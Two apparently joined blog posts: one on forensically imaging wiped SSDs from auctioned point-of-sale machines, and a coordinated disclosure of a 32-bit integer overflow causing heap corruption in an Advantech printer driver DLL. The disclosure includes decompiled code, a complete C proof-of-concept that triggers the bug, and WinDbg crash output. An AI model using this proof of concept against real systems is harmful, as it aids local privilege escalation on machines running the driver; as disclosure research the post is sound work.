These originally caught my eye, as these boxes are often used in front of house systems, might have all sorts of different devices plugged into them, and have all sorts of potentially juicy targets on them. I also wanted to make sure I was doing things right here, if these drives contained a tonne of cool drivers or even a tonne of customer data, I wanted to be sure that I knew the data lineage/provenance, so cue the SOP (Standard Operating Procedure) for ewaste disks!

World 2: Designing the “POS Driver Hunting Lab” Project

I make the mistake of not keeping good notes almost daily. This time, however, it was going to be different. First I had to figure out what bits of information I wanted to keep track of so that I could trace the data provenance. I ended up coming up with this:

• HOST:
  • Auction lot
  • Model / brand
  • Vendor labels or asset tags
  • CPU
  • RAM
  • Drives
  • Cards

So in the processing of a new e-waste computer I will need to record all that information, where I will record even more info per drive and card if they exist.

Now for the drives I wanted to record a bit more information both in my notes application and on disk, but for now let’s focus on the notes app.

• DRIVE:
  • Model
  • Serial
  • Form factor
  • Source (i.e which host)
  • Date imaged
  • Imaging tool used
  • Hash
  • Contents notes
  • Status

With all that info for each disk I felt like I was in a place where I could tie any data found on any drive down to the lot number it came from. I thought this could have been important if I managed to find a tonne of customer data stored unencrypted or something like that.

Here is an example of a note or two:

HOSTS:

### Host-02 – Aures Ssf J2 480L

- **Auction lot:** `#06`
- **Type:** POS box
- **Vendor labels / asset tags:**
  - `I0032871`
  - `S/N Q305690002`
  -  ``windows embedded POS READY: REDACTED x20-88070`
- **Internal layout:**
  - CPU: `Celeron ??`
  - RAM: `1x Crucial 4GB DDR3-1600` `1x TLA 4GB DDR3-1600`
  - Drives: `NA`
- **Actions:**
  - [x] Labelled chassis (`HOST-02`)
  - [x] Drives removed + labelled
  - [x] RAM removed + inventoried
  - [ ] Chassis sent to ewaste
- **NOTES**
	- Sticker on the side that had `REDACTED (take a guess at what this was. If you guessed passwords you were right!)`

DISKS:

### Drv-01 – 120GB 750 Evo (from HOST-01)

- **Physical drive**
  - Model: `Samsung SSD 750 EVO 120GB`
  - Serial: `S33MNB0H715656A`
  - Form factor: `2.5" SATA`

- **Source host:** `HOST-01 – Aures J2 480L`

- **Imaging**
  - Date: [[2025-11-30]]
  - Tool: `ddrescue`
  - Commands:

`text
  sudo ddrescue -n /dev/sdb DRV-01.img DRV-01.log
`

  - Hashes:

	```text
    sha256: 45ea7cb72917f774e077e36fc0d885ffd381840584a63986db371ffcddec0fb5
    ```

- Imaging: ✅ complete
- Contents: wiped SSD, empty partition table, no filesystem
- Status: Archived – no further analysis

- **Next steps**
  - [x] Make working copy: `cp DRV-01.img work_DRV-01.img` ✅ 2025-11-30

World 3: Imaging SOP: From One-off Commands to a Repeatable Process

Now that I have all the note keeping out of the way time to actually do something with the disks.

It turns out that all of the drives were 2.5” SSDs, and as it has been a while since I have done any disk imaging - so I can’t find which bloody box / drawer / storage locker my sata to usb converter is in - I had to head out and buy a new docking station. I ended up with this one from Jaycar: https://www.jaycar.co.nz/usb-3-0-sata-hdd-docking-station/p/XC4687 In the future I think I will look for a hardware write blocker to ensure that I am NEVER changing what is on the disks.

Below is my work flow for imaging the disks:

# First I need to find the device
lsblk -o NAME,SIZE,MODEL,SERIAL  # from here I can take the /dev/sdX in this case lets call it sdd
# Now I need to make sure that I am mounting it in READ ONLY!!
sudo blockdev --setro /dev/sdd
# Then confirm that it is in fact in RO with
lsblk -o NAME,RO /dev/sdd
# Now we image it!
# We will start off with a single pass of ddrestore:
sudo ddrescue -n /dev/sdd DRV-06.img DRV-06.log # Note the DRV-0X here this is useful for your own note keeping
# I then inspect the log, make sure it was imaged correctly then create the sha256 hash for it.
sha256sum DRV-06.img > DRV-06.img.sha256
# From here I can fill out the rest of the info in my drive notes.

Great ! Now we have a bunch of images of the drives, where everything should be exactly the same as what was on the disk itself.

Since we have a copy, we can now attempt mounting the image, and having a look.

Here I am working on the assumption that these disks have not been tampered with, nor have they been wiped, since that is my best case scenario (more on this later :P)

World 4: What Was Actually on the Disks (spoiler: Almost nothing)

So… after painfully manually imaging each and every disk, keeping a good working log, and tracking the provenance of each drive, it was finally time to reap the spoils of my hard work.

Spoiler: there were no spoils.

First Pass: “Surely there’s a Windows Install in Here somewhere?”

The very first thing I did with each image was the obvious:

sudo fdisk -l DRV-01.img
Disk DRV-01.img: 111.79 GiB, 120034123776 bytes, 234441648 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000

Device      Boot Start End Sectors Size Id Type DRV-01.img1 *        0   0       0   0B  0 Empty

:(

Drive after drive, the same story. I jumped on each one hoping this was finally it. Nothing.

• Disklabel type: dos
• A single “partition” entry of type 0 Empty
• Start = 0, End = 0, Sectors = 0

So there was an MBR, but the partition table itself was effectively blank. No neat little NTFS or HPFS/NTFS/exFAT entries, no recovery partition, nothing.

file wasn’t any more encouraging:

neuro on Berne in …/neuro/data/POS-IMAGES file DRV-01.img
DRV-01.img: DOS/MBR boot sector

Okay. So we have a boot sector. Maybe the interesting stuff is hiding further in!!

Here I will use hexdump to just have a look at what is on the disk, at a few different intervals, first I want to see the MBR, Then what is on the disk 1mb in, and finally 1GB in:

neuro on Berne in …/neuro/data/POS-IMAGES hexdump -C -n 512 DRV-01.img | head
00000000  eb 01 90 ea 08 7c 00 00  fc b8 00 10 8e c0 b8 7f  |.....|..........|
00000010  02 31 db b9 03 00 30 f6  cd 13 0f 82 f1 00 b8 00  |.1....0.........|
00000020  10 8e d8 b8 00 20 8e c0  31 f6 66 31 ff 31 d2 bd  |..... ..1.f1.1..|
00000030  35 7c e9 dc 00 88 c3 c0  e3 04 bd 40 7c e9 d1 00  |5|.........@|...|
00000040  08 d8 30 e4 89 c1 a8 80  75 1e bd 50 7c e9 c1 00  |..0.....u..P|...|
00000050  41 26 88 05 66 47 85 ff  75 0a 8c c7 81 c7 00 10  |A&..fG..u.......|
00000060  8e c7 31 ff e2 eb eb 1f  80 e1 7f 41 bd 72 7c e9  |..1........A.r|.|
00000070  9f 00 26 88 05 66 47 85  ff 75 0a 8c c7 81 c7 00  |..&..fG..u......|
00000080  10 8e c7 31 ff e2 e8 66  81 ff 00 b0 04 00 72 9f  |...1...f......r.|
00000090  b8 12 00 cd 10 31 db be  28 7d ba c8 03 88 d8 3c  |.....1..(}.....<|
neuro on Berne in …/neuro/data/POS-IMAGES dd if=DRV-01.img bs=1M skip=1 count=1 | hexdump -C | head
00000000  5f 0b a2 54 78 e2 cc 74  11 43 05 7f da ab ab 7b  |_..Tx..t.C.....{|
00000010  e0 7d 20 8c 2f 63 47 78  e4 74 5a 38 bc a5 2c 4c  |.} ./cGx.tZ8..,L|
00000020  b7 ea ef 48 98 44 28 2d  e4 c5 65 ff f3 0b 9f fd  |...H.D(-..e.....|
00000030  a2 55 af a4 d3 42 24 85  90 0c 67 2f 4a 9c 0f 6c  |.U...B$...g/J..l|
00000040  3e e2 75 9b 58 32 9a 1c  f4 dc db a2 de 07 c5 72  |>.u.X2.........r|
00000050  dc b7 b2 5d b0 86 4f 04  ac fa d2 07 8c 72 a3 9f  |...]..O......r..|
00000060  48 8f c2 5b 2d c2 94 3a  41 80 f0 fa 62 95 63 d2  |H..[-..:A...b.c.|
00000070  d4 93 40 78 88 ae 90 fe  aa 14 75 01 7f 5d 44 92  |..@x......u..]D.|
00000080  c2 d1 0c 35 aa d8 59 29  7c 1f e6 c2 af 77 26 ef  |...5..Y)|....w&.|
00000090  b1 5b 9f 9b 43 c3 c6 ed  61 a2 d2 f9 b9 d3 20 f0  |.[..C...a..... .|
neuro on Berne in …/neuro/data/POS-IMAGES dd if=DRV-01.img bs=1M skip=1024 count=1 | hexdump -C | head
00000000  49 a7 f0 48 3a c6 2e 27  b1 1c a8 03 39 47 c1 c5  |I..H:..'....9G..|
00000010  d9 8a 31 21 74 f5 df f1  8b d6 84 38 a4 90 4e a6  |..1!t......8..N.|
00000020  26 59 4b bf 89 28 ca 34  50 31 1c ca 93 12 23 db  |&YK..(.4P1....#.|
00000030  30 ae ea 7e ce 70 83 9e  fa 5e 65 ed e9 d7 78 32  |0..~.p...^e...x2|
00000040  0a 3a 42 98 25 f8 d0 cd  3b 8f e3 e2 8e bf 67 e2  |.:B.%...;.....g.|
00000050  09 de a2 36 28 62 25 c6  b2 ed 9c fb b5 a7 d9 39  |...6(b%........9|
00000060  5a 54 f0 3d 13 88 34 6a  f4 8b 64 00 d6 32 13 73  |ZT.=..4j..d..2.s|
00000070  1c 76 00 6d 5e ed fd 1d  0e fd 7a 2e 7c 60 86 64  |.v.m^.....z.|`.d|
00000080  54 f1 de a4 37 15 44 69  b7 69 b0 10 42 6a ed de  |T...7.Di.i..Bj..|
00000090  01 85 d4 e0 6b cf 2b 8e  aa 0e aa 4f 8a b8 f9 5f  |....k.+....O..._|

Sector 0 looked like a perfectly normal boot stub, some real mode 16-bit code, nothing obviously custom or branded. This looks like a normal MBR. However the rest were high entropy, gibberish. Great.

This high-entropy randomness is the hallmark of either strong encryption or a secure wipe tool like DBAN or the built-in Windows ‘Format’ secure erase. No recognizable patterns, no filesystem signatures just noise.

Okay okay, you know what MAYBE I can find some interesting strings on the drive, if there was any sort of Windows OS on it I would expect to see:

• Paths like \Windows\System32...
• PE headers (This program cannot be run in DOS mode)
• Device driver names, INF fragments, registry junk, etc.

neuro on Berne in …/neuro/data/POS-IMAGES strings -a DRV-01.img | head
???:99235,./&(*000
r*I&
1xKv'i
*bHe
Gw@`
Ww1Wwv @
Gw@@
Ww`w
wwDFww
fwwP

Nope, gibberish again, this is not looking good.

Finally in a last ditch effort I threw both testdisk and photorec at the images, both to no avail.

Finally I can conclude that the shop that was doing the auction, did a really good job at making sure that there was no recoverable data from these POS machines. Good for privacy and security, bad for me who is hunting for POS drivers!

World 5: Automating the Boring Bits

After doing this a few times by hand, I realised my “workflow” was basically a pile of oneliners in my bash history ready for me to forget how to use and how to run :

• remember to set the disk read-only
• remember the right ddrescue incantation
• remember where I put the image
• remember to hash it (properly named) afterwards

That was okay for this one off experiment, but if I wanted to continue doing this in my search for POS drivers I would need a much more robust, and reusable approach, enter my tiny crappy bash scripts:

https://github.com/NeuroWinter/lab-scripts/tree/main/disks

Very briefly, they do this:

• image_and_hash.sh
  • Takes a block device (e.g. /dev/sdd) and a logical name (DRV-06).
  • Sets the device read-only as a software write blocker.
  • Runs ddrescue into a temp image + log.
  • Copies the image into my POS-IMAGES directory while streaming it through sha256sum and md5sum, so I get hashes and the final image in a single pass.
  • Moves the ddrescue log next to the image and deletes the temp file.
• hash_one_image.sh
  • Takes an existing *.img and generates matching *.img.sha256 and *.img.md5 sidecar files.
  • Skips images that already have both hashes, so I can just point it at a folder and let it churn.

They’re not fancy, but that’s the point: I now have a repeatable, boring, safeish by default way to go from “mystery SATA SSD” to “documented image + hashes + provenance in my notes”, without relying on whatever badly remembered commands happen to be in my history that day.

World 6: Lessons From the Data Being in Another Castle

While there was no real plunder for this voyage, I gained valuable intel:

What Worked

1. Methodology is solid - The provenance tracking and imaging scripts are reusable
2. Validation of ethics - This auction house takes data destruction seriously
3. New forensics skills - testdisk and photorec are now in my toolkit
4. Negative signal is signal - Now I know to avoid professional IT liquidators

Next Steps

The princess…er, drivers, are still out there. The scripts work the methodology is sound, I just need to find sellers who aren’t doing their job properly. Time to try another world.

If you’re attempting similar research: learn from my expensive mistake and target the bottom of the market, not the professional middle.

• The driver’s “monochrome blit” pipeline (8bpp → 1bpp), reachable via a DRVFN entry in DrvRender_x64_ADVANTECH.dll, works out the 1-bpp buffer size with 32-bit arithmetic and then writes height*stride bytes into it.

• With attacker controlled surface geometry (width/height) plus a lax “count/length” field, the driver allocates too little memory and smashes the heap.

• The result is a reliable heap corruption crash (0xC0000374) and highly likely path to privilege escalation with some extra work

• No spooler access is required to trigger the bug; a local process that loads the DLL can reach the path.

• The trigger for this bug does not require any admin or spooler access, all that is needed is access to the dll.

• Driver can be found here: Advantech URP-PT802/PT803 Driver Download this uses the same TP 3250 driver under the hood.

Background:

After poking around and finding the bug in the last blog post in the DrvUI dll (previous post), I chose to look at some of the other dlls installed with these drivers :)

One of those dlls was the DrvRender_x64_ADVANTECH.dll the fun thing here is that this dll exposes a load of different functions that can be called from an external program, one of which looked interesting as it had a tonne of different arithmetic. This turned out to be fruitful as there were some 32bit -> 64bit conversions which is never a good idea.

Test Env:

• Virtual box running Microsoft Windows 10 build 19041 x64
• Clean VM with only Windgb, Vbox additions, and the driver installed.
• A remote path to my host machine to move exes and other files around.

Repro:

1. Compile the ex.c file in the appendix, eg: x86_64-w64-mingw32-gcc ex.c -o ex.exe -lwinspool

2. Enable crash dumps on the windows system. See previous post to see how

3. Install the driver from the link above (in TLDR)

4. Run the compiled code and view the ex.exe.N file in C:\Dumps\ or wherever you set you dumps to go. Another option is to run gflags /p /enable ex.exe /full and then run the exe inside of WinDbg

The Bug

From DLL to DRVFN table

So, one of the main things I learnt in this process was that of the DRVFN table. For those unfamiliar with Windows driver architecture, the DRVFN (Driver Function) table is a dispatch table that printer drivers use to tell Windows which functions they support. When a driver’s DrvEnableDriver function is called, it returns this table containing function indices (like 0x13 for DrvCopyBits) paired with pointers to the actual implementation functions. Think of it as the driver saying “here is what I can do, and where you can find it” Windows then uses these function pointers to call into the driver when it needs to do things with the driver.

One of the functions that was exported in the DLL was DrvEnableDriver(uint param_1,uint param_2,undefined4 *param_3) This was a major give away to the DRVFN table’s structure (Note that in this snippit, I have already renamed the DAT to DRVFN64_ARRAY_180005f50, since I have converted it):

undefined8 DrvEnableDriver(uint param_1,uint param_2,undefined4 *param_3)

{
  DWORD dwErrCode;

                    /* 0x10e44  3  DrvEnableDriver */
  if (param_1 < 0x20000) {
    dwErrCode = 0x77;
  }
  else {
    if (0xf < param_2) {
      *param_3 = 0x20000;
      param_3[1] = 0x16;
      *(DRVFN64 **)(param_3 + 2) = DRVFN64_ARRAY_180005f50;
      return 1;
    }
    dwErrCode = 0x57;
  }
  SetLastError(dwErrCode);
  return 0;
}

What this tells us is that there is a structure at the location of 180005f50 that takes the from:

param_3[1] = 0x16; tells us that the length of the array is 22. Also Windows defines DRVFN as {ULONG iFunc; PFN pfn; } on x64, a pad is inserted between the 4-byte iFunc and the 8-byte pointer, so each element is 16 bytes:

Now this can be applied to the structure at 180005f50 and we know there are 22 elements.

This will point us to the functions that we can use from the dll. Today we are looking at the 10th element or:

          180005ff0 13 00 00 00 00  DRVFN64                           [10]
                    00 00 00 54 55
                    01 80 01 00 00
             180005ff0 13 00 00 00     uint32_t  13h                     iFunc
             180005ff4 00 00 00 00     uint32_t  0h                      pad
             180005ff8 54 55 01 80 01  UINT64    180015554h              pfn
                       00 00 00

DrvEnableDriver → DRVFN[] → [iFunc=0x13] → RVA 0x15554

Call Path

The vulnerable call path that we are exploiting here is in that function at 15554:

0x15554 (wrapper)
    0x177B8  (8-bpp plane builder)   ← can under-allocate
    0x1817C  (1-bpp allocator)       ← can under-allocate
        0x21C08  (1-bpp packer)          ← overflow sink
            → EngCreateBitmap → EngAssociateSurface → EngCopyBits

Vulnerable code

Okay so now lets have a look at these functions:

ulonglong FUN_180015554(longlong param_1,longlong param_2,undefined8 param_3,longlong param_4,
                       uint *param_5,uint *param_6)

{
  ...
  if ((((param_2 == 0) || (param_4 == 0)) || (param_5 == (uint *)0x0)) ||
     (*(int *)(lVar5 + 0x128) == 1)) {
    ...
  }
  else {
    local_438 = 0;
    memset(local_434,0,0x3fc);
    uVar3 = *(uint *)(param_2 + 0x24);
    uStack_454 = 0;
    local_458 = 0;
    local_res8 = (void *)CONCAT44(local_res8._4_4_,*(undefined4 *)(param_2 + 0x20));
    local_res10 = uVar3;
    iVar2 = XLATEOBJ_cGetPalette(param_4,1,*(undefined4 *)(param_4 + 0xc),&local_438);
    uVar1 = (uint)local_res8;
    local_res8 = (void *)FUN_1800177b8(*(longlong *)(param_2 + 0x30),*(uint *)(param_2 + 0x28),
                                       (longlong)&local_438,iVar2,*(int *)(param_2 + 0x48),
                                       (uint)local_res8,uVar3,*(float *)(lVar5 + 300),
                                       *(float *)(lVar5 + 0x130));
    if (local_res8 == (void *)0x0) {
      uVar6 = 0;
    }
    else {
      _Memory = FUN_18001817c((longlong)local_res8,(ulonglong)((uVar1 + 3 >> 2) * uVar3 * 4),uVar1,
                              uVar3,*(int *)(lVar5 + 0x128));
      if (_Memory != (byte *)0x0) {
        uStack_454 = local_res10;
        local_458 = uVar1;
        lVar4 = EngCreateBitmap(CONCAT44(local_res10,uVar1),(uVar1 + 0x1f & 0xffffffe0) >> 3,1,2,
                                _Memory);
        if (lVar4 != 0) {
          iVar2 = EngAssociateSurface(lVar4,*(undefined8 *)(lVar5 + 8),0);
          if (iVar2 != 0) {
            lVar5 = EngLockSurface(lVar4);
            if (lVar5 != 0) {
              uVar3 = EngCopyBits(param_1,lVar5,param_3,0,param_5,param_6);
              uVar6 = (ulonglong)uVar3;
              EngUnlockSurface(lVar5);
            }
          }
          EngDeleteSurface(lVar4);
        }
        free(_Memory);
      }
      free(local_res8);
    }
  }
  return uVar6;
}

The whole purpose of this function is to wrap around all the other functions that we call, this takes a lot of params that I have figured out from the rest of the code are:

(PVOID)ctx,       // psoTrg (destination surface)
(PVOID)surf1,     // psoSrc (source surface)
NULL,             // pco null for no clipping..
(PVOID)surf2,     // pxlo (color translation - must be non-NULL)
&dst_rect,        // prclTrg (destination rectangle)
&src_point        // pptlSrc

In our PoC the params mean that this if statement is false: if ((((param_2 == 0) || (param_4 == 0)) || (param_5 == (uint *)0x0)) || (*(int *)(lVar5 + 0x128) == 1)) So we hit the path that then calls FUN_1800177b8 which is where the fun happens, well in the inner calls is where the fun is:

void FUN_1800177b8(longlong param_1,uint param_2,longlong param_3,int param_4,int param_5,
                  int param_6,uint param_7,float param_8,float param_9)

{
  uVar8 = ((int)((param_6 + 3 >> 0x1f & 3U) + param_6 + 3) >> 2) * 4;
  ...
  _Dst = malloc((ulonglong)(uVar8 * param_7));
  if (_Dst != (void *)0x0) {
    memset(_Dst,0xff,(ulonglong)(uVar8 * param_7));
    // ... pack pixels into 1-bpp, advancing one row by uVar8 each iteration this is just a bunch of if / elif
  FUN_180023520(local_68 ^ (ulonglong)auStack_198);
  return;
}

Now, sure most of this function has been removed, but it is those first two lines in this snippet that are the real clincher here. That uVar8 * param_7 is where we are doing the product of 2 32bit vars and then widened to 64bit, this carrys the risk of under allocation. The multiplication overflows in 32-bit space before being widened to 64-bit.Example: 0x10000 * 0x10000 = 0x100000000, but in 32 bit = 0x0 That undersized buffer is then initialized here: memset(_Dst,0xff,(ulonglong)(uVar8 * param_7));

Now that we have that initalized we can move back to the wrapper function were FUN_18001817c is called

byte * FUN_18001817c(longlong param_1,undefined8 param_2,int param_3,uint param_4,int param_5)

{
  uint uVar1;
  byte *_Dst;
  size_t _Size;
  undefined4 in_stack_ffffffffffffffc4;
  undefined4 in_stack_ffffffffffffffcc;
  undefined4 local_28;
  undefined4 local_24;
  undefined4 local_20;
  undefined4 local_1c;
  undefined4 local_18;
  undefined4 local_14;

  uVar1 = param_3 + 0x1f + (param_3 + 0x1f >> 0x1f & 0x1fU);
  _Size = (size_t)(int)(((int)((uVar1 & 0xffffffe0) + ((int)uVar1 >> 0x1f & 7U)) >> 3) * param_4);
  _Dst = (byte *)malloc(_Size);
  if (_Dst != (byte *)0x0) {
    memset(_Dst,0,_Size);
    if (param_5 == 2) {
      FUN_1800212a8(param_1,param_3,param_4,_Dst);
    }
    else if (param_5 == 3) {
      FUN_1800215d8(param_1,param_3,param_4,_Dst);
    }
    else if (param_5 == 4) {
      local_28 = 0;
      local_24 = 0;
      local_14 = 0;
      local_1c = 1;
      local_18 = 1;
      local_20 = 2;
      FUN_180021908(param_1,param_3,param_4,(longlong)_Dst,(longlong)&local_28,
                    CONCAT44(in_stack_ffffffffffffffc4,2),CONCAT44(in_stack_ffffffffffffffcc,3),4.0)
      ;
    }
    else {
      FUN_180021c08(param_1,param_3,param_4,_Dst);
    }
  }
  return _Dst;
}

This function receives the undersized buffer from FUN_1800177b8 as param_1, but calculates its own buffer size using a different formula. It then allocates _Dst and calls FUN_180021c08 (the overflow sink from our call path).

void FUN_180021c08(longlong param_1,int param_2,uint param_3,byte *param_4)

{
  uint uVar1;
  longlong lVar2;
  ulonglong uVar3;
  int iVar4;
  int iVar5;
  byte *pbVar6;

  uVar1 = param_2 + 0x1f + (param_2 + 0x1f >> 0x1f & 0x1fU);
  if (0 < (int)param_3) {
    lVar2 = 0;
    uVar3 = (ulonglong)param_3;
    do {
      iVar5 = 0;
      pbVar6 = param_4;
      if (0 < param_2) {
        do {
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)(iVar5 + lVar2 + param_1)) & 0x80U;
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)((iVar5 + 1) + lVar2 + param_1)) & 0x40U;
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)((iVar5 + 2) + lVar2 + param_1)) & 0x20U;
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)((iVar5 + 3) + lVar2 + param_1)) & 0x10U;
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)((iVar5 + 4) + lVar2 + param_1)) & 8U;
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)((iVar5 + 5) + lVar2 + param_1)) & 4U;
          iVar4 = iVar5 + 7;
          *pbVar6 = *pbVar6 | -(0x7f < *(byte *)((iVar5 + 6) + lVar2 + param_1)) & 2U;
          iVar5 = iVar5 + 8;
          *pbVar6 = *pbVar6 | 0x7f < *(byte *)(iVar4 + lVar2 + param_1);
          pbVar6 = pbVar6 + 1;
        } while (iVar5 < param_2);
      }
      param_4 = param_4 + ((int)((uVar1 & 0xffffffe0) + ((int)uVar1 >> 0x1f & 7U)) >> 3);
      lVar2 = lVar2 + (((int)((param_2 + 3 >> 0x1f & 3U) + param_2 + 3) >> 2) << 2);
      uVar3 = uVar3 - 1;
    } while (uVar3 != 0);
  }
  return;
}

The vulnerability chain is:

1. FUN_1800177b8 allocates buffer using uVar8 * param_7 (32-bit overflow → too small)
2. FUN_18001817c receives this buffer and calculates a CORRECT size for the output
3. FUN_180021c08 reads from the undersized input buffer and writes to the output
4. When the packer function tries to read height × stride bytes from the undersized source buffer, it reads beyond the allocation → heap corruption

Impact

This vulnerability represents a serious local privilege escalation risk for systems with the Advantech TP-3250 printer driver installed. The key impacts include:

Heap Corruption and Code Execution

The 32 bit integer overflow leads to a controllable heap corruption condition. An attacker who can trigger this bug gains the ability to corrupt heap metadata and adjacent allocations. With smarter techniques than what I have done this corruption can be leveraged to achieve arbitrary code execution.

Low user level rights needed

Unlike many printer driver vulnerabilities, this bug does not require:

• Admin privileges
• Print spooler service access
• Network connectivity
• User interaction

Any local user with the ability to load the DrvRender_x64_ADVANTECH.dll library can trigger this vulnerability. The attack surface is significantly larger than typical spooler-based printer exploits. This is also widened since the dll is also placed in the path: C://Advantech/

Privilege Escalation Vector

Because printer drivers on Windows often run with elevated privileges or in security-sensitive contexts, successful exploitation could allow:

• A low-privileged user to gain SYSTEM privileges
• Escape from application sandboxes
• Bypass security boundaries in enterprise environments

Timeline

• Tue, Jul 29 2025: Bug discovered and reported to NCSC
• Fri, Aug 1 2025: Response from NCSC
• Wed, Aug 13 2025: NCSC reported bug to vendor
• Mon, Oct 6 2025: NCSC informed me that the disclosure period has ended and I am free to post about this.

Appendix:

A - POC

#include <windows.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>

typedef ULONG (__stdcall *PFN_DrvCopyBits_t)(
    PVOID psoTrg,
    PVOID psoSrc,
    PVOID pco,
    PVOID pxlo,
    PRECTL prclTrg,
    PPOINTL pptlSrc
);

int main() {
    const char *dll_path = "DrvRender_x64_ADVANTECH.dll";
    DWORD rva = 0x15554; // func offset within dll got this from the drvfn table.

    // Load the DLL
    HMODULE base = LoadLibraryA(dll_path);
    if (!base) {
        fprintf(stderr, "Oh NO! LoadLibraryA failed (%lu)\n", GetLastError());
        return 1;
    }

    // Calculate function address
    PFN_DrvCopyBits_t PFN_DrvCopyBits = (PFN_DrvCopyBits_t)((BYTE *)base + rva);
    printf("dll loaded at %p, 'PFN_DrvCopyBits' at %p\n", base, PFN_DrvCopyBits);

    // structures needed
    uint8_t *ctx    = (uint8_t *)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    uint8_t *inner  = (uint8_t *)VirtualAlloc(NULL, 0x200,  MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    uint8_t *surf1  = (uint8_t *)VirtualAlloc(NULL, 0x100,  MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    uint8_t *surf2  = (uint8_t *)VirtualAlloc(NULL, 0x100,  MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Larger pixel buffer to potentially avoid AV detection
    uint8_t *pixels = (uint8_t *)VirtualAlloc(NULL, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Check allocations
    if (!ctx || !inner || !surf1 || !surf2 || !pixels) {
        fprintf(stderr, "NO!!!! Memory allocation failed\n");
        goto cleanup;
    }

    // Initialize with patterns for debugging
    memset(ctx,    0x41, 0x1000);
    memset(inner,  0x42, 0x200);
    memset(surf1,  0x43, 0x100);
    memset(surf2,  0x44, 0x100);
    memset(pixels, 0x45, 0x10000);

    // initialise context structure fields
    *(uint64_t *)(ctx + 0x10) = (uint64_t)inner;

    *(int *)(inner + 0x128) = 0;

    *(uint64_t *)(ctx + 0x30) = 0;
    *(uint64_t *)(ctx + 0x38) = 0;
    *(uint64_t *)(ctx + 0x438) = 0;

    memset(surf2, 0, 0x10);

    // Set up surface structure to trigger overflow condition
    uint32_t width  = 0x40000000;  // Large width for overflow
    uint32_t height = 8;

    *(uint32_t *)(surf1 + 0x20) = width;
    *(uint32_t *)(surf1 + 0x24) = height;
    *(uint32_t *)(surf1 + 0x28) = 0xFFFFFFFF; // Large count value
    *(uint64_t *)(surf1 + 0x30) = (uint64_t)pixels;
    *(uint32_t *)(surf1 + 0x48) = 1;

    RECTL dst_rect = {0, 0, 64, 64};
    POINTL src_point = {0, 0};

    printf("[*] Triggering pixel transform with width=0x%x height=0x%x (may overflow)\n", width, height);
    printf("[*] Calling PFN_DrvCopyBits...\n");

    ULONG result = PFN_DrvCopyBits(
        (PVOID)ctx,       // psoTrg (destination surface)
        (PVOID)surf1,     // psoSrc (source surface)
        NULL,             // pco null for no clipping..
        (PVOID)surf2,     // pxlo (color translation - must be non-NULL)
        &dst_rect,        // prclTrg (destination rectangle)
        &src_point        // pptlSrc
    );

    printf("[+] PFN_DrvCopyBits returned: 0x%lu\n", result);

cleanup:
    // release all the allocations
    if (ctx)    VirtualFree(ctx,    0, MEM_RELEASE);
    if (inner)  VirtualFree(inner,  0, MEM_RELEASE);
    if (surf1)  VirtualFree(surf1,  0, MEM_RELEASE);
    if (surf2)  VirtualFree(surf2,  0, MEM_RELEASE);
    if (pixels) VirtualFree(pixels, 0, MEM_RELEASE);
    if (base) FreeLibrary(base);

    return 0;
}

B - WinDbg output

0:000> !analyze -v
..................
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

    Key  : AV.Type
    Value: Write

    Key  : Analysis.CPU.mSec
    Value: 718

    Key  : Analysis.Elapsed.mSec
    Value: 14452

    Key  : Analysis.IO.Other.Mb
    Value: 0

    Key  : Analysis.IO.Read.Mb
    Value: 1

    Key  : Analysis.IO.Write.Mb
    Value: 4

    Key  : Analysis.Init.CPU.mSec
    Value: 796

    Key  : Analysis.Init.Elapsed.mSec
    Value: 19788

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 86

    Key  : Analysis.Version.DbgEng
    Value: 10.0.27871.1001

    Key  : Analysis.Version.Description
    Value: 10.2505.01.02 amd64fre

    Key  : Analysis.Version.Ext
    Value: 1.2505.1.2

    Key  : Failure.Bucket
    Value: INVALID_POINTER_WRITE_AVRF_c0000005_DrvRender_x64_ADVANTECH.dll!Unknown

    Key  : Failure.Exception.Code
    Value: 0xc0000005

    Key  : Failure.Exception.IP.Address
    Value: 0x7ffd5c547a00

    Key  : Failure.Exception.IP.Module
    Value: DrvRender_x64_ADVANTECH

    Key  : Failure.Exception.IP.Offset
    Value: 0x17a00

    Key  : Failure.Hash
    Value: {28021f10-bbf5-db82-dbf6-c0ff68f801c3}

    Key  : Failure.ProblemClass.Primary
    Value: INVALID_POINTER_WRITE

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 37991

    Key  : Timeline.Process.Start.DeltaSec
    Value: 2

    Key  : WER.OS.Branch
    Value: vb_release

    Key  : WER.OS.Version
    Value: 10.0.19041.1


FILE_IN_CAB:  ex.exe.2676.dmp

NTGLOBALFLAG:  2200000

APPLICATION_VERIFIER_FLAGS:  0

APPLICATION_VERIFIER_LOADED: 1

CONTEXT:  (.ecxr)
rax=0000000000000000 rbx=000001c5b6964ff0 rcx=0000000000000010
rdx=0000000000000000 rsi=0000000040000000 rdi=0000000000000011
rip=00007ffd5c547a00 rsp=0000006174dff620 rbp=0000000000000045
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000002
r11=000000001fffffff r12=000000003fffffff r13=00000000ffffffff
r14=000001c5b5620000 r15=0000000000000001
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
DrvRender_x64_ADVANTECH!DrvEnableDriver+0x6bbc:
00007ffd`5c547a00 880419          mov     byte ptr [rcx+rbx],al ds:000001c5`b6965000=??
Resetting default scope

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffd5c547a00 (DrvRender_x64_ADVANTECH!DrvEnableDriver+0x0000000000006bbc)
